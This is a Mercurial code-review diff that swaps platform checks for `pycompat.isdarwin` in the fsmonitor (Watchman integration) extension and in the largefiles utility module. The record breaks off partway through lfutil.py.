codemod: use pycompat.isdarwin...
Jun Wu, r34648:dacfcdd8 (default branch)
@@ -1,803 +1,803 @@ hgext/fsmonitor/__init__.py
1 1 # __init__.py - fsmonitor initialization and overrides
2 2 #
3 3 # Copyright 2013-2016 Facebook, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 '''Faster status operations with the Watchman file monitor (EXPERIMENTAL)
9 9
10 10 Integrates the file-watching program Watchman with Mercurial to produce faster
11 11 status results.
12 12
13 13 On a particular Linux system, for a real-world repository with over 400,000
14 14 files hosted on ext4, vanilla `hg status` takes 1.3 seconds. On the same
15 15 system, with fsmonitor it takes about 0.3 seconds.
16 16
17 17 fsmonitor requires no configuration -- it will tell Watchman about your
18 18 repository as necessary. You'll need to install Watchman from
19 19 https://facebook.github.io/watchman/ and make sure it is in your PATH.
20 20
21 21 The following configuration options exist:
22 22
23 23 ::
24 24
25 25 [fsmonitor]
26 26 mode = {off, on, paranoid}
27 27
28 28 When `mode = off`, fsmonitor will disable itself (similar to not loading the
29 29 extension at all). When `mode = on`, fsmonitor will be enabled (the default).
30 30 When `mode = paranoid`, fsmonitor will query both Watchman and the filesystem,
31 31 and ensure that the results are consistent.
32 32
33 33 ::
34 34
35 35 [fsmonitor]
36 36 timeout = (float)
37 37
38 38 A value, in seconds, that determines how long fsmonitor will wait for Watchman
39 39 to return results. Defaults to `2.0`.
40 40
41 41 ::
42 42
43 43 [fsmonitor]
44 44 blacklistusers = (list of userids)
45 45
46 46 A list of usernames for which fsmonitor will disable itself altogether.
47 47
48 48 ::
49 49
50 50 [fsmonitor]
51 51 walk_on_invalidate = (boolean)
52 52
53 53 Whether or not to walk the whole repo ourselves when our cached state has been
54 54 invalidated, for example when Watchman has been restarted or .hgignore rules
55 55 have been changed. Walking the repo in that case can result in competing for
56 56 I/O with Watchman. For large repos it is recommended to set this value to
57 57 false. You may wish to set this to true if you have a very fast filesystem
58 58 that can outpace the IPC overhead of getting the result data for the full repo
59 59 from Watchman. Defaults to false.
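
As an illustrative example only (the values below are chosen for
demonstration, not shipped defaults), these options can be combined in an
``hgrc``::

    [fsmonitor]
    mode = on
    timeout = 10.0
    walk_on_invalidate = false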
60 60
61 61 fsmonitor is incompatible with the largefiles and eol extensions, and
62 62 will disable itself if any of those are active.
63 63
64 64 '''
65 65
66 66 # Platforms Supported
67 67 # ===================
68 68 #
69 69 # **Linux:** *Stable*. Watchman and fsmonitor are both known to work reliably,
70 70 # even under severe loads.
71 71 #
72 72 # **Mac OS X:** *Stable*. The Mercurial test suite passes with fsmonitor
73 73 # turned on, on case-insensitive HFS+. There has been a reasonable amount of
74 74 # user testing under normal loads.
75 75 #
76 76 # **Solaris, BSD:** *Alpha*. Watchman and fsmonitor are believed to work, but
77 77 # very little testing has been done.
78 78 #
79 79 # **Windows:** *Alpha*. Not yet in a release version of Watchman or fsmonitor.
80 80 #
81 81 # Known Issues
82 82 # ============
83 83 #
84 84 # * fsmonitor will disable itself if any of the following extensions are
85 85 # enabled: largefiles, inotify, eol; or if the repository has subrepos.
86 86 # * fsmonitor will produce incorrect results if nested repos that are not
87 87 # subrepos exist. *Workaround*: add nested repo paths to your `.hgignore`.
88 88 #
89 89 # The issues related to nested repos and subrepos are probably not fundamental
90 90 # ones. Patches to fix them are welcome.
91 91
92 92 from __future__ import absolute_import
93 93
94 94 import codecs
95 95 import hashlib
96 96 import os
97 97 import stat
98 98 import sys
99 99 import weakref
100 100
101 101 from mercurial.i18n import _
102 102 from mercurial.node import (
103 103 hex,
104 104 nullid,
105 105 )
106 106
107 107 from mercurial import (
108 108 context,
109 109 encoding,
110 110 error,
111 111 extensions,
112 112 localrepo,
113 113 merge,
114 114 pathutil,
115 115 pycompat,
116 116 registrar,
117 117 scmutil,
118 118 util,
119 119 )
120 120 from mercurial import match as matchmod
121 121
122 122 from . import (
123 123 pywatchman,
124 124 state,
125 125 watchmanclient,
126 126 )
127 127
128 128 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
129 129 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
130 130 # be specifying the version(s) of Mercurial they are tested with, or
131 131 # leave the attribute unspecified.
132 132 testedwith = 'ships-with-hg-core'
133 133
134 134 configtable = {}
135 135 configitem = registrar.configitem(configtable)
136 136
137 137 configitem('fsmonitor', 'mode',
138 138 default='on',
139 139 )
140 140 configitem('fsmonitor', 'walk_on_invalidate',
141 141 default=False,
142 142 )
143 143 configitem('fsmonitor', 'timeout',
144 144 default='2',
145 145 )
146 146 configitem('fsmonitor', 'blacklistusers',
147 147 default=list,
148 148 )
149 149
150 150 # This extension is incompatible with the following blacklisted extensions
151 151 # and will disable itself when encountering one of these:
152 152 _blacklist = ['largefiles', 'eol']
153 153
154 154 def _handleunavailable(ui, state, ex):
155 155 """Exception handler for Watchman interaction exceptions"""
156 156 if isinstance(ex, watchmanclient.Unavailable):
157 157 if ex.warn:
158 158 ui.warn(str(ex) + '\n')
159 159 if ex.invalidate:
160 160 state.invalidate()
161 161 ui.log('fsmonitor', 'Watchman unavailable: %s\n', ex.msg)
162 162 else:
163 163 ui.log('fsmonitor', 'Watchman exception: %s\n', ex)
164 164
165 165 def _hashignore(ignore):
166 166 """Calculate hash for ignore patterns and filenames
167 167
168 168 If this information changes between Mercurial invocations, we can't
169 169 rely on Watchman information anymore and have to re-scan the working
170 170 copy.
171 171
172 172 """
173 173 sha1 = hashlib.sha1()
174 174 sha1.update(repr(ignore))
175 175 return sha1.hexdigest()
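# For example (illustrative): editing .hgignore changes repr(ignore) and so
# changes this digest; overridewalk() below treats the mismatch as a signal
# to stop trusting the saved Watchman state and either walk the repo or
# re-query from the NULL clock instead.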
176 176
177 177 _watchmanencoding = pywatchman.encoding.get_local_encoding()
178 178 _fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
179 179 _fixencoding = codecs.lookup(_watchmanencoding) != codecs.lookup(_fsencoding)
180 180
181 181 def _watchmantofsencoding(path):
182 182 """Fix path to match watchman and local filesystem encoding
183 183
184 184 watchman's paths encoding can differ from filesystem encoding. For example,
185 185 on Windows, it's always utf-8.
186 186 """
187 187 try:
188 188 decoded = path.decode(_watchmanencoding)
189 189 except UnicodeDecodeError as e:
190 190 raise error.Abort(str(e), hint='watchman encoding error')
191 191
192 192 try:
193 193 encoded = decoded.encode(_fsencoding, 'strict')
194 194 except UnicodeEncodeError as e:
195 195 raise error.Abort(str(e))
196 196
197 197 return encoded
198 198
199 199 def overridewalk(orig, self, match, subrepos, unknown, ignored, full=True):
200 200 '''Replacement for dirstate.walk, hooking into Watchman.
201 201
202 202 Whenever full is False, ignored is False, and the Watchman client is
203 203 available, use Watchman combined with saved state to possibly return only a
204 204 subset of files.'''
205 205 def bail():
206 206 return orig(match, subrepos, unknown, ignored, full=True)
207 207
208 208 if full or ignored or not self._watchmanclient.available():
209 209 return bail()
210 210 state = self._fsmonitorstate
211 211 clock, ignorehash, notefiles = state.get()
212 212 if not clock:
213 213 if state.walk_on_invalidate:
214 214 return bail()
215 215 # Initial NULL clock value, see
216 216 # https://facebook.github.io/watchman/docs/clockspec.html
217 217 clock = 'c:0:0'
218 218 notefiles = []
219 219
220 220 def fwarn(f, msg):
221 221 self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
222 222 return False
223 223
224 224 def badtype(mode):
225 225 kind = _('unknown')
226 226 if stat.S_ISCHR(mode):
227 227 kind = _('character device')
228 228 elif stat.S_ISBLK(mode):
229 229 kind = _('block device')
230 230 elif stat.S_ISFIFO(mode):
231 231 kind = _('fifo')
232 232 elif stat.S_ISSOCK(mode):
233 233 kind = _('socket')
234 234 elif stat.S_ISDIR(mode):
235 235 kind = _('directory')
236 236 return _('unsupported file type (type is %s)') % kind
237 237
238 238 ignore = self._ignore
239 239 dirignore = self._dirignore
240 240 if unknown:
241 241 if _hashignore(ignore) != ignorehash and clock != 'c:0:0':
242 242 # ignore list changed -- can't rely on Watchman state any more
243 243 if state.walk_on_invalidate:
244 244 return bail()
245 245 notefiles = []
246 246 clock = 'c:0:0'
247 247 else:
248 248 # always ignore
249 249 ignore = util.always
250 250 dirignore = util.always
251 251
252 252 matchfn = match.matchfn
253 253 matchalways = match.always()
254 254 dmap = self._map._map
255 255 nonnormalset = getattr(self, '_nonnormalset', None)
256 256
257 257 copymap = self._map.copymap
258 258 getkind = stat.S_IFMT
259 259 dirkind = stat.S_IFDIR
260 260 regkind = stat.S_IFREG
261 261 lnkkind = stat.S_IFLNK
262 262 join = self._join
263 263 normcase = util.normcase
264 264 fresh_instance = False
265 265
266 266 exact = skipstep3 = False
267 267 if match.isexact(): # match.exact
268 268 exact = True
269 269 dirignore = util.always # skip step 2
270 270 elif match.prefix(): # match.match, no patterns
271 271 skipstep3 = True
272 272
273 273 if not exact and self._checkcase:
274 274 # note that even though we could receive directory entries, we're only
275 275 # interested in checking if a file with the same name exists. So only
276 276 # normalize files if possible.
277 277 normalize = self._normalizefile
278 278 skipstep3 = False
279 279 else:
280 280 normalize = None
281 281
282 282 # step 1: find all explicit files
283 283 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
284 284
285 285 skipstep3 = skipstep3 and not (work or dirsnotfound)
286 286 work = [d for d in work if not dirignore(d[0])]
287 287
288 288 if not work and (exact or skipstep3):
289 289 for s in subrepos:
290 290 del results[s]
291 291 del results['.hg']
292 292 return results
293 293
294 294 # step 2: query Watchman
295 295 try:
296 296 # Use the user-configured timeout for the query.
297 297 # Add a little slack on top of the user-configured timeout to allow
298 298 # for overhead while transferring the data
299 299 self._watchmanclient.settimeout(state.timeout + 0.1)
300 300 result = self._watchmanclient.command('query', {
301 301 'fields': ['mode', 'mtime', 'size', 'exists', 'name'],
302 302 'since': clock,
303 303 'expression': [
304 304 'not', [
305 305 'anyof', ['dirname', '.hg'],
306 306 ['name', '.hg', 'wholename']
307 307 ]
308 308 ],
309 309 'sync_timeout': int(state.timeout * 1000),
310 310 'empty_on_fresh_instance': state.walk_on_invalidate,
311 311 })
312 312 except Exception as ex:
313 313 _handleunavailable(self._ui, state, ex)
314 314 self._watchmanclient.clearconnection()
315 315 return bail()
316 316 else:
317 317 # We need to propagate the last observed clock up so that we
318 318 # can use it for our next query
319 319 state.setlastclock(result['clock'])
320 320 if result['is_fresh_instance']:
321 321 if state.walk_on_invalidate:
322 322 state.invalidate()
323 323 return bail()
324 324 fresh_instance = True
325 325 # Ignore any prior notable files from the state info
326 326 notefiles = []
327 327
328 328 # for file paths which require normalization and for which we may
329 329 # encounter a case collision, we store our own foldmap
330 330 if normalize:
331 331 foldmap = dict((normcase(k), k) for k in results)
332 332
333 333 switch_slashes = pycompat.ossep == '\\'
334 334 # The order of the results is, strictly speaking, undefined.
335 335 # For case changes on a case insensitive filesystem we may receive
336 336 # two entries, one with exists=True and another with exists=False.
337 337 # The exists=True entries in the same response should be interpreted
338 338 # as being happens-after the exists=False entries due to the way that
339 339 # Watchman tracks files. We use this property to reconcile deletes
340 340 # for name case changes.
341 341 for entry in result['files']:
342 342 fname = entry['name']
343 343 if _fixencoding:
344 344 fname = _watchmantofsencoding(fname)
345 345 if switch_slashes:
346 346 fname = fname.replace('\\', '/')
347 347 if normalize:
348 348 normed = normcase(fname)
349 349 fname = normalize(fname, True, True)
350 350 foldmap[normed] = fname
351 351 fmode = entry['mode']
352 352 fexists = entry['exists']
353 353 kind = getkind(fmode)
354 354
355 355 if not fexists:
356 356 # if marked as deleted and we don't already have a change
357 357 # record, mark it as deleted. If we already have an entry
358 358 # for fname then it was either part of walkexplicit or was
359 359 # an earlier result that was a case change
360 360 if fname not in results and fname in dmap and (
361 361 matchalways or matchfn(fname)):
362 362 results[fname] = None
363 363 elif kind == dirkind:
364 364 if fname in dmap and (matchalways or matchfn(fname)):
365 365 results[fname] = None
366 366 elif kind == regkind or kind == lnkkind:
367 367 if fname in dmap:
368 368 if matchalways or matchfn(fname):
369 369 results[fname] = entry
370 370 elif (matchalways or matchfn(fname)) and not ignore(fname):
371 371 results[fname] = entry
372 372 elif fname in dmap and (matchalways or matchfn(fname)):
373 373 results[fname] = None
374 374
375 375 # step 3: query notable files we don't already know about
376 376 # XXX try not to iterate over the entire dmap
377 377 if normalize:
378 378 # any notable files that have changed case will already be handled
379 379 # above, so just check membership in the foldmap
380 380 notefiles = set((normalize(f, True, True) for f in notefiles
381 381 if normcase(f) not in foldmap))
382 382 visit = set((f for f in notefiles if (f not in results and matchfn(f)
383 383 and (f in dmap or not ignore(f)))))
384 384
385 385 if nonnormalset is not None and not fresh_instance:
386 386 if matchalways:
387 387 visit.update(f for f in nonnormalset if f not in results)
388 388 visit.update(f for f in copymap if f not in results)
389 389 else:
390 390 visit.update(f for f in nonnormalset
391 391 if f not in results and matchfn(f))
392 392 visit.update(f for f in copymap
393 393 if f not in results and matchfn(f))
394 394 else:
395 395 if matchalways:
396 396 visit.update(f for f, st in dmap.iteritems()
397 397 if (f not in results and
398 398 (st[2] < 0 or st[0] != 'n' or fresh_instance)))
399 399 visit.update(f for f in copymap if f not in results)
400 400 else:
401 401 visit.update(f for f, st in dmap.iteritems()
402 402 if (f not in results and
403 403 (st[2] < 0 or st[0] != 'n' or fresh_instance)
404 404 and matchfn(f)))
405 405 visit.update(f for f in copymap
406 406 if f not in results and matchfn(f))
407 407
408 408 audit = pathutil.pathauditor(self._root, cached=True).check
409 409 auditpass = [f for f in visit if audit(f)]
410 410 auditpass.sort()
411 411 auditfail = visit.difference(auditpass)
412 412 for f in auditfail:
413 413 results[f] = None
414 414
415 415 nf = iter(auditpass).next
416 416 for st in util.statfiles([join(f) for f in auditpass]):
417 417 f = nf()
418 418 if st or f in dmap:
419 419 results[f] = st
420 420
421 421 for s in subrepos:
422 422 del results[s]
423 423 del results['.hg']
424 424 return results
425 425
426 426 def overridestatus(
427 427 orig, self, node1='.', node2=None, match=None, ignored=False,
428 428 clean=False, unknown=False, listsubrepos=False):
429 429 listignored = ignored
430 430 listclean = clean
431 431 listunknown = unknown
432 432
433 433 def _cmpsets(l1, l2):
434 434 try:
435 435 if 'FSMONITOR_LOG_FILE' in encoding.environ:
436 436 fn = encoding.environ['FSMONITOR_LOG_FILE']
437 437 f = open(fn, 'wb')
438 438 else:
439 439 fn = 'fsmonitorfail.log'
440 440 f = self.opener(fn, 'wb')
441 441 except (IOError, OSError):
442 442 self.ui.warn(_('warning: unable to write to %s\n') % fn)
443 443 return
444 444
445 445 try:
446 446 for i, (s1, s2) in enumerate(zip(l1, l2)):
447 447 if set(s1) != set(s2):
448 448 f.write('sets at position %d are unequal\n' % i)
449 449 f.write('watchman returned: %s\n' % s1)
450 450 f.write('stat returned: %s\n' % s2)
451 451 finally:
452 452 f.close()
453 453
454 454 if isinstance(node1, context.changectx):
455 455 ctx1 = node1
456 456 else:
457 457 ctx1 = self[node1]
458 458 if isinstance(node2, context.changectx):
459 459 ctx2 = node2
460 460 else:
461 461 ctx2 = self[node2]
462 462
463 463 working = ctx2.rev() is None
464 464 parentworking = working and ctx1 == self['.']
465 465 match = match or matchmod.always(self.root, self.getcwd())
466 466
467 467 # Maybe we can use this opportunity to update Watchman's state.
468 468 # Mercurial uses workingcommitctx and/or memctx to represent the part of
469 469 # the workingctx that is to be committed. So don't update the state in
470 470 # that case.
471 471 # HG_PENDING is set in the environment when the dirstate is being updated
472 472 # in the middle of a transaction; we must not update our state in that
473 473 # case, or we risk forgetting about changes in the working copy.
474 474 updatestate = (parentworking and match.always() and
475 475 not isinstance(ctx2, (context.workingcommitctx,
476 476 context.memctx)) and
477 477 'HG_PENDING' not in encoding.environ)
478 478
479 479 try:
480 480 if self._fsmonitorstate.walk_on_invalidate:
481 481 # Use a short timeout to query the current clock. If that
482 482 # takes too long then we assume that the service will be slow
483 483 # to answer our query.
484 484 # walk_on_invalidate indicates that we prefer to walk the
485 485 # tree ourselves because we can ignore portions that Watchman
486 486 # cannot and we tend to be faster in the warmer buffer cache
487 487 # cases.
488 488 self._watchmanclient.settimeout(0.1)
489 489 else:
490 490 # Give Watchman more time to potentially complete its walk
491 491 # and return the initial clock. In this mode we assume that
492 492 # the filesystem will be slower than parsing a potentially
493 493 # very large Watchman result set.
494 494 self._watchmanclient.settimeout(
495 495 self._fsmonitorstate.timeout + 0.1)
496 496 startclock = self._watchmanclient.getcurrentclock()
497 497 except Exception as ex:
498 498 self._watchmanclient.clearconnection()
499 499 _handleunavailable(self.ui, self._fsmonitorstate, ex)
500 500 # boo, Watchman failed. bail
501 501 return orig(node1, node2, match, listignored, listclean,
502 502 listunknown, listsubrepos)
503 503
504 504 if updatestate:
505 505 # We need info about unknown files. This may make things slower the
506 506 # first time, but whatever.
507 507 stateunknown = True
508 508 else:
509 509 stateunknown = listunknown
510 510
511 511 if updatestate:
512 512 ps = poststatus(startclock)
513 513 self.addpostdsstatus(ps)
514 514
515 515 r = orig(node1, node2, match, listignored, listclean, stateunknown,
516 516 listsubrepos)
517 517 modified, added, removed, deleted, unknown, ignored, clean = r
518 518
519 519 if not listunknown:
520 520 unknown = []
521 521
522 522 # don't do paranoid checks if we're not going to query Watchman anyway
523 523 full = listclean or match.traversedir is not None
524 524 if self._fsmonitorstate.mode == 'paranoid' and not full:
525 525 # run status again and fall back to the old walk this time
526 526 self.dirstate._fsmonitordisable = True
527 527
528 528 # shut the UI up
529 529 quiet = self.ui.quiet
530 530 self.ui.quiet = True
531 531 fout, ferr = self.ui.fout, self.ui.ferr
532 532 self.ui.fout = self.ui.ferr = open(os.devnull, 'wb')
533 533
534 534 try:
535 535 rv2 = orig(
536 536 node1, node2, match, listignored, listclean, listunknown,
537 537 listsubrepos)
538 538 finally:
539 539 self.dirstate._fsmonitordisable = False
540 540 self.ui.quiet = quiet
541 541 self.ui.fout, self.ui.ferr = fout, ferr
542 542
543 543 # clean isn't tested since it's set to True above
544 544 _cmpsets([modified, added, removed, deleted, unknown, ignored, clean],
545 545 rv2)
546 546 modified, added, removed, deleted, unknown, ignored, clean = rv2
547 547
548 548 return scmutil.status(
549 549 modified, added, removed, deleted, unknown, ignored, clean)
550 550
551 551 class poststatus(object):
552 552 def __init__(self, startclock):
553 553 self._startclock = startclock
554 554
555 555 def __call__(self, wctx, status):
556 556 clock = wctx.repo()._fsmonitorstate.getlastclock() or self._startclock
557 557 hashignore = _hashignore(wctx.repo().dirstate._ignore)
558 558 notefiles = (status.modified + status.added + status.removed +
559 559 status.deleted + status.unknown)
560 560 wctx.repo()._fsmonitorstate.set(clock, hashignore, notefiles)
561 561
562 562 def makedirstate(repo, dirstate):
563 563 class fsmonitordirstate(dirstate.__class__):
564 564 def _fsmonitorinit(self, repo):
565 565 # _fsmonitordisable is used in paranoid mode
566 566 self._fsmonitordisable = False
567 567 self._fsmonitorstate = repo._fsmonitorstate
568 568 self._watchmanclient = repo._watchmanclient
569 569 self._repo = weakref.proxy(repo)
570 570
571 571 def walk(self, *args, **kwargs):
572 572 orig = super(fsmonitordirstate, self).walk
573 573 if self._fsmonitordisable:
574 574 return orig(*args, **kwargs)
575 575 return overridewalk(orig, self, *args, **kwargs)
576 576
577 577 def rebuild(self, *args, **kwargs):
578 578 self._fsmonitorstate.invalidate()
579 579 return super(fsmonitordirstate, self).rebuild(*args, **kwargs)
580 580
581 581 def invalidate(self, *args, **kwargs):
582 582 self._fsmonitorstate.invalidate()
583 583 return super(fsmonitordirstate, self).invalidate(*args, **kwargs)
584 584
585 585 if dirstate._ui.configbool(
586 586 "experimental", "fsmonitor.wc_change_notify"):
587 587 def setparents(self, p1, p2=nullid):
588 588 with state_update(self._repo, name="hg.wc_change",
589 589 oldnode=self._pl[0], newnode=p1,
590 590 partial=False):
591 591 return super(fsmonitordirstate, self).setparents(p1, p2)
592 592
593 593 dirstate.__class__ = fsmonitordirstate
594 594 dirstate._fsmonitorinit(repo)
595 595
596 596 def wrapdirstate(orig, self):
597 597 ds = orig(self)
598 598 # only override the dirstate when Watchman is available for the repo
599 599 if util.safehasattr(self, '_fsmonitorstate'):
600 600 makedirstate(self, ds)
601 601 return ds
602 602
603 603 def extsetup(ui):
604 604 extensions.wrapfilecache(
605 605 localrepo.localrepository, 'dirstate', wrapdirstate)
606 - if pycompat.sysplatform == 'darwin':
606 + if pycompat.isdarwin:
607 607 # An assist for avoiding the dangling-symlink fsevents bug
608 608 extensions.wrapfunction(os, 'symlink', wrapsymlink)
609 609
610 610 extensions.wrapfunction(merge, 'update', wrapupdate)
611 611
612 612 def wrapsymlink(orig, source, link_name):
613 613 ''' if we create a dangling symlink, also touch the parent dir
614 614 to encourage fsevents notifications to work more correctly '''
615 615 try:
616 616 return orig(source, link_name)
617 617 finally:
618 618 try:
619 619 os.utime(os.path.dirname(link_name), None)
620 620 except OSError:
621 621 pass
622 622
623 623 class state_update(object):
624 624 ''' This context manager is responsible for dispatching the state-enter
625 625 and state-leave signals to the watchman service. The enter and leave
626 626 methods can be invoked manually (for scenarios where context manager
627 627 semantics are not possible). If parameters oldnode and newnode are None,
628 628 they will be populated based on the current working copy in enter and
629 629 leave, respectively. Similarly, if distance is None, it will be
630 630 calculated based on the oldnode and newnode in the leave method.'''
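# Illustrative usage sketch (assumed, not taken from this changeset): the
# context-manager form brackets a single working copy mutation, while the
# explicit enter()/exit() calls suit operations that begin and end in
# different call frames, as the transaction wrapper in reposetup() does:
#
#   with state_update(repo, name='hg.update'):
#       ...  # mutate the working copy; oldnode/newnode default to repo['.']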
631 631
632 632 def __init__(self, repo, name, oldnode=None, newnode=None, distance=None,
633 633 partial=False):
634 634 self.repo = repo.unfiltered()
635 635 self.name = name
636 636 self.oldnode = oldnode
637 637 self.newnode = newnode
638 638 self.distance = distance
639 639 self.partial = partial
640 640 self._lock = None
641 641 self.need_leave = False
642 642
643 643 def __enter__(self):
644 644 self.enter()
645 645
646 646 def enter(self):
647 647 # We explicitly need to take a lock here, before we proceed to update
648 648 # watchman about the update operation, so that we don't race with
649 649 # some other actor. merge.update is going to take the wlock almost
650 650 # immediately anyway, so this is effectively extending the lock
651 651 # around a couple of short sanity checks.
652 652 if self.oldnode is None:
653 653 self.oldnode = self.repo['.'].node()
654 654 self._lock = self.repo.wlock()
655 655 self.need_leave = self._state(
656 656 'state-enter',
657 657 hex(self.oldnode))
658 658 return self
659 659
660 660 def __exit__(self, type_, value, tb):
661 661 abort = bool(type_)
662 662 self.exit(abort=abort)
663 663
664 664 def exit(self, abort=False):
665 665 try:
666 666 if self.need_leave:
667 667 status = 'failed' if abort else 'ok'
668 668 if self.newnode is None:
669 669 self.newnode = self.repo['.'].node()
670 670 if self.distance is None:
671 671 self.distance = calcdistance(
672 672 self.repo, self.oldnode, self.newnode)
673 673 self._state(
674 674 'state-leave',
675 675 hex(self.newnode),
676 676 status=status)
677 677 finally:
678 678 self.need_leave = False
679 679 if self._lock:
680 680 self._lock.release()
681 681
682 682 def _state(self, cmd, commithash, status='ok'):
683 683 if not util.safehasattr(self.repo, '_watchmanclient'):
684 684 return False
685 685 try:
686 686 self.repo._watchmanclient.command(cmd, {
687 687 'name': self.name,
688 688 'metadata': {
689 689 # the target revision
690 690 'rev': commithash,
691 691 # approximate number of commits between current and target
692 692 'distance': self.distance if self.distance else 0,
693 693 # success/failure (only really meaningful for state-leave)
694 694 'status': status,
695 695 # whether the working copy parent is changing
696 696 'partial': self.partial,
697 697 }})
698 698 return True
699 699 except Exception as e:
700 700 # Swallow any errors; fire and forget
701 701 self.repo.ui.log(
702 702 'watchman', 'Exception %s while running %s\n', e, cmd)
703 703 return False
704 704
705 705 # Estimate the distance between two nodes
706 706 def calcdistance(repo, oldnode, newnode):
707 707 anc = repo.changelog.ancestor(oldnode, newnode)
708 708 ancrev = repo[anc].rev()
709 709 distance = (abs(repo[oldnode].rev() - ancrev)
710 710 + abs(repo[newnode].rev() - ancrev))
711 711 return distance
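# Worked example (illustrative revision numbers): with oldnode at rev 12,
# newnode at rev 17, and their common ancestor at rev 10, the estimate is
# abs(12 - 10) + abs(17 - 10) = 2 + 7 = 9 commits.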
712 712
713 713 # Bracket working copy updates with calls to the watchman state-enter
714 714 # and state-leave commands. This allows clients to perform more intelligent
715 715 # settling during bulk file change scenarios
716 716 # https://facebook.github.io/watchman/docs/cmd/subscribe.html#advanced-settling
717 717 def wrapupdate(orig, repo, node, branchmerge, force, ancestor=None,
718 718 mergeancestor=False, labels=None, matcher=None, **kwargs):
719 719
720 720 distance = 0
721 721 partial = True
722 722 oldnode = repo['.'].node()
723 723 newnode = repo[node].node()
724 724 if matcher is None or matcher.always():
725 725 partial = False
726 726 distance = calcdistance(repo.unfiltered(), oldnode, newnode)
727 727
728 728 with state_update(repo, name="hg.update", oldnode=oldnode, newnode=newnode,
729 729 distance=distance, partial=partial):
730 730 return orig(
731 731 repo, node, branchmerge, force, ancestor, mergeancestor,
732 732 labels, matcher, **kwargs)
733 733
734 734 def reposetup(ui, repo):
735 735 # We don't work with largefiles or eol
736 736 exts = extensions.enabled()
737 737 for ext in _blacklist:
738 738 if ext in exts:
739 739 ui.warn(_('The fsmonitor extension is incompatible with the %s '
740 740 'extension and has been disabled.\n') % ext)
741 741 return
742 742
743 743 if repo.local():
744 744 # We don't work with subrepos either.
745 745 #
746 746 # Checking repo[None].substate can cause a dirstate parse, which is
747 747 # too slow. Instead, look directly for the .hgsubstate/.hgsub files.
748 748 if repo.wvfs.exists('.hgsubstate') or repo.wvfs.exists('.hgsub'):
749 749 return
750 750
751 751 fsmonitorstate = state.state(repo)
752 752 if fsmonitorstate.mode == 'off':
753 753 return
754 754
755 755 try:
756 756 client = watchmanclient.client(repo)
757 757 except Exception as ex:
758 758 _handleunavailable(ui, fsmonitorstate, ex)
759 759 return
760 760
761 761 repo._fsmonitorstate = fsmonitorstate
762 762 repo._watchmanclient = client
763 763
764 764 dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
765 765 if cached:
766 766 # at this point since fsmonitorstate wasn't present,
767 767 # repo.dirstate is not a fsmonitordirstate
768 768 makedirstate(repo, dirstate)
769 769
770 770 class fsmonitorrepo(repo.__class__):
771 771 def status(self, *args, **kwargs):
772 772 orig = super(fsmonitorrepo, self).status
773 773 return overridestatus(orig, self, *args, **kwargs)
774 774
775 775 if ui.configbool("experimental", "fsmonitor.transaction_notify"):
776 776 def transaction(self, *args, **kwargs):
777 777 tr = super(fsmonitorrepo, self).transaction(
778 778 *args, **kwargs)
779 779 if tr.count != 1:
780 780 return tr
781 781 stateupdate = state_update(self, name="hg.transaction")
782 782 stateupdate.enter()
783 783
784 784 class fsmonitortrans(tr.__class__):
785 785 def _abort(self):
786 786 try:
787 787 result = super(fsmonitortrans, self)._abort()
788 788 finally:
789 789 stateupdate.exit(abort=True)
790 790 return result
791 791
792 792 def close(self):
793 793 try:
794 794 result = super(fsmonitortrans, self).close()
795 795 finally:
796 796 if self.count == 0:
797 797 stateupdate.exit()
798 798 return result
799 799
800 800 tr.__class__ = fsmonitortrans
801 801 return tr
802 802
803 803 repo.__class__ = fsmonitorrepo
@@ -1,673 +1,673 @@ hgext/largefiles/lfutil.py
1 1 # Copyright 2009-2010 Gregory P. Ward
2 2 # Copyright 2009-2010 Intelerad Medical Systems Incorporated
3 3 # Copyright 2010-2011 Fog Creek Software
4 4 # Copyright 2010-2011 Unity Technologies
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 '''largefiles utility code: must not import other modules in this package.'''
10 10 from __future__ import absolute_import
11 11
12 12 import copy
13 13 import hashlib
14 14 import os
15 15 import stat
16 16
17 17 from mercurial.i18n import _
18 18
19 19 from mercurial import (
20 20 dirstate,
21 21 encoding,
22 22 error,
23 23 httpconnection,
24 24 match as matchmod,
25 25 node,
26 26 pycompat,
27 27 scmutil,
28 28 sparse,
29 29 util,
30 30 vfs as vfsmod,
31 31 )
32 32
33 33 shortname = '.hglf'
34 34 shortnameslash = shortname + '/'
35 35 longname = 'largefiles'
36 36
37 37 # -- Private worker functions ------------------------------------------
38 38
39 39 def getminsize(ui, assumelfiles, opt, default=10):
40 40 lfsize = opt
41 41 if not lfsize and assumelfiles:
42 42 lfsize = ui.config(longname, 'minsize', default=default)
43 43 if lfsize:
44 44 try:
45 45 lfsize = float(lfsize)
46 46 except ValueError:
47 47 raise error.Abort(_('largefiles: size must be a number (not %s)\n')
48 48 % lfsize)
49 49 if lfsize is None:
50 50 raise error.Abort(_('minimum size for largefiles must be specified'))
51 51 return lfsize
52 52
53 53 def link(src, dest):
54 54 """Try to create hardlink - if that fails, efficiently make a copy."""
55 55 util.makedirs(os.path.dirname(dest))
56 56 try:
57 57 util.oslink(src, dest)
58 58 except OSError:
59 59 # if hardlinking fails, fall back to an atomic copy
60 60 with open(src, 'rb') as srcf, util.atomictempfile(dest) as dstf:
61 61 for chunk in util.filechunkiter(srcf):
62 62 dstf.write(chunk)
63 63 os.chmod(dest, os.stat(src).st_mode)
64 64
65 65 def usercachepath(ui, hash):
66 66 '''Return the correct location in the "global" largefiles cache for a file
67 67 with the given hash.
68 68 This cache is used for sharing of largefiles across repositories - both
69 69 to preserve download bandwidth and storage space.'''
70 70 return os.path.join(_usercachedir(ui), hash)
71 71
72 72 def _usercachedir(ui):
73 73 '''Return the location of the "global" largefiles cache.'''
74 74 path = ui.configpath(longname, 'usercache', None)
75 75 if path:
76 76 return path
77 77 if pycompat.iswindows:
78 78 appdata = encoding.environ.get('LOCALAPPDATA',\
79 79 encoding.environ.get('APPDATA'))
80 80 if appdata:
81 81 return os.path.join(appdata, longname)
82 - elif pycompat.sysplatform == 'darwin':
82 + elif pycompat.isdarwin:
83 83 home = encoding.environ.get('HOME')
84 84 if home:
85 85 return os.path.join(home, 'Library', 'Caches', longname)
86 86 elif pycompat.isposix:
